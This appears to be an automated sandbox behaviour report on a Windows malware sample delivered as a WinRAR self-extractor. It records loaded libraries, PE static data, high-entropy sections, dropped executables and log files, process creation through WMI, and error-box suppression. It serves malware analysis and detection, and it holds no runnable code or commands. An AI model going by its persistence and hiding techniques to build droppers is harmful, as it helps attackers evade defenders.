Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: gkcQYEdJSO.exe

Static file information: File size 2283768 > 1048576

Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gkcQYEdJSO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: gkcQYEdJSO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: gkcQYEdJSO.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: gkcQYEdJSO.exe
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3065183190.000000001C2BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3E1F1BD.loggntkrnlmp.pdb source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3065183190.000000001C2BD000.00000004.00000020.00020000.00000000.sdmp

Source: gkcQYEdJSO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gkcQYEdJSO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gkcQYEdJSO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gkcQYEdJSO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gkcQYEdJSO.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

File created: C:\Bridgecontainerserver\__tmp_rar_sfx_access_check_6524671

Jump to behavior

Source: gkcQYEdJSO.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDF640 push ecx; ret	0_2_00DDF653
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDEB78 push eax; ret	0_2_00DDEB96
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC5372 push edx; ret	7_2_00007FFD9BAC5375
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC46F2 push E9000002h; ret	7_2_00007FFD9BAC4703
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC420D push edi; ret	7_2_00007FFD9BAC420E
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 7_2_00007FFD9BAC4205 push edi; ret	7_2_00007FFD9BAC4206
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9B97D2A5 pushad ; iretd	14_2_00007FFD9B97D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BA98AAC push eax; iretd	14_2_00007FFD9BA98ABA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FFD9BB6A3E9 push cs; ret	14_2_00007FFD9BB6A3EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B98D2A5 pushad ; iretd	15_2_00007FFD9B98D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9BAA8AAC push eax; iretd	15_2_00007FFD9BAA8ABA
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAE5909 pushfd ; retf	22_2_00007FFD9BAE58F1
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAE582D pushfd ; retf	22_2_00007FFD9BAE58F1
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAE5F91 push esp; retf	22_2_00007FFD9BAE5F99
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAE3388 pushfd ; iretd	22_2_00007FFD9BAE3389
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC5372 push edx; ret	22_2_00007FFD9BAC5375
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC46F2 push E9000002h; ret	22_2_00007FFD9BAC4703
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC420D push edi; ret	22_2_00007FFD9BAC420E
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAC4205 push edi; ret	22_2_00007FFD9BAC4206
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAD8AE3 push esp; iretd	22_2_00007FFD9BAD8AFB
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 22_2_00007FFD9BAD8ED9 push esi; retf	22_2_00007FFD9BAD8EF9
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB5372 push edx; ret	23_2_00007FFD9BAB5375
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB46F2 push E9000002h; ret	23_2_00007FFD9BAB4703
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB420D push edi; ret	23_2_00007FFD9BAB420E
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Code function: 23_2_00007FFD9BAB4205 push edi; ret	23_2_00007FFD9BAB4206
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAB8AE3 push esp; iretd	24_2_00007FFD9BAB8AFB
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAB8ED9 push esi; retf	24_2_00007FFD9BAB8EF9
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA5372 push edx; ret	24_2_00007FFD9BAA5375
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA46F2 push E9000002h; ret	24_2_00007FFD9BAA4703
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA420D push edi; ret	24_2_00007FFD9BAA420E
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Code function: 24_2_00007FFD9BAA4205 push edi; ret	24_2_00007FFD9BAA4206

Source: BrokerhostNet.exe.0.dr	Static PE information: section name: .text entropy: 7.557430002630692
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe.7.dr	Static PE information: section name: .text entropy: 7.557430002630692

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\uznrhtzR.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\utIZHXKr.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\pXxtswpF.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\foddJTjY.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\QARGDIci.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\NcCXpyPJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	File created: C:\Bridgecontainerserver\BrokerhostNet.exe	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\WFKNZreq.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\cnLmOXeC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\BxbrKIuG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\aQOwrfcH.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Jump to dropped file

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\utIZHXKr.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\pXxtswpF.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\foddJTjY.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\WFKNZreq.log	Jump to dropped file
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File created: C:\Users\user\Desktop\NcCXpyPJ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\QARGDIci.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\uznrhtzR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\cnLmOXeC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\BxbrKIuG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File created: C:\Users\user\Desktop\aQOwrfcH.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
